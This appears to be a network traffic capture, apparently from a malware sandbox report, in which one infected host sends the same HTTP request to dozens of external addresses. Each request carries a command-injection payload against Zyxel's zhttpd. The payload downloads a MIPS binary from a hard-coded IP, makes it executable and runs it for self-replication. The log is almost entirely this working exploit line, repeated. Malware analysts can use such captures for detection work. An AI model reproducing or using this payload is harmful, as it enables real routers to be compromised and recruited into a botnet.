                                            Feb 2, 2024 06:21:03.455733061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2002192.168.2.153971254.69.214.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455751896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2003192.168.2.155684238.219.150.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455781937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2004192.168.2.153911819.171.227.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455816031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2005192.168.2.1543452129.16.83.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455842018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2006192.168.2.1539678146.58.62.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455918074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2007192.168.2.1552416158.78.124.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.455955982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2008192.168.2.1541038122.6.70.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456003904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2009192.168.2.1557040175.149.147.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456051111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2010192.168.2.154669082.116.73.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456088066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2011192.168.2.1535786123.83.18.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456115961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2012192.168.2.1555054219.127.77.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456145048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2013192.168.2.1548166145.253.164.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456207037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2014192.168.2.1538572142.144.246.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456243038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2015192.168.2.153620677.197.66.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456269026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2016192.168.2.1547896216.142.241.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456326008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2017192.168.2.154956484.123.197.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456366062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2018192.168.2.1546896104.229.45.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456399918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2019192.168.2.1545432136.33.148.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456427097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2020192.168.2.155041281.240.80.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456451893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2021192.168.2.1546902132.68.114.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456490993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2022192.168.2.15554569.143.48.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456523895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2023192.168.2.1556468140.58.173.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456568003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2024192.168.2.1551730154.44.187.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456590891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2025192.168.2.1538052158.2.102.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456641912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2026192.168.2.155069887.67.116.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456690073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2027192.168.2.153675478.194.221.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456706047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2028192.168.2.155454261.131.22.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456756115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2029192.168.2.154507491.108.251.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456808090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2030192.168.2.1560734102.81.215.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456830025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2031192.168.2.154491092.84.90.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456891060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2032192.168.2.154484861.84.121.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456934929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2033192.168.2.1534564107.174.162.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456969976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2034192.168.2.1544054143.69.118.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.456996918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2035192.168.2.1551282203.10.53.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457039118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2036192.168.2.15358944.38.160.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457062006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2037192.168.2.1546326116.175.230.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457093000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2038192.168.2.154045624.244.56.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457119942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2039192.168.2.1534680154.10.111.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457156897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2040192.168.2.153887050.245.89.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457163095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2041192.168.2.154075886.142.157.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457226992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2042192.168.2.1558764132.62.180.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457252026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2043192.168.2.1554516186.120.35.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457304001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2044192.168.2.1537968147.100.123.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457340956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2045192.168.2.1547754159.205.152.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457375050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2046192.168.2.1549868156.127.32.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457407951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2047192.168.2.154246012.13.238.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457448959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2048192.168.2.155063696.57.112.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457480907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2049192.168.2.1544006155.124.12.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457525015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2050192.168.2.1534766198.175.247.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457545042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2051192.168.2.1536104119.190.82.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457585096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2052192.168.2.154238275.221.80.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457637072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2053192.168.2.154243891.59.16.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457673073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2054192.168.2.153802814.114.63.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457710981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2055192.168.2.154596269.70.86.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457751989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2056192.168.2.153852885.135.161.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457801104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2057192.168.2.1549858148.216.249.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457828999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2058192.168.2.154861048.221.229.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457859993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2059192.168.2.1540888185.245.249.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457885027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2060192.168.2.1550568205.165.7.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457931042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2061192.168.2.1541866221.109.225.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457958937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2062192.168.2.153638897.17.51.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.457981110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2063192.168.2.15585621.79.222.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458012104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2064192.168.2.1538286111.43.57.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.458072901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2065192.168.2.153638664.51.197.103443
                                            TimestampBytes transferredDirectionData
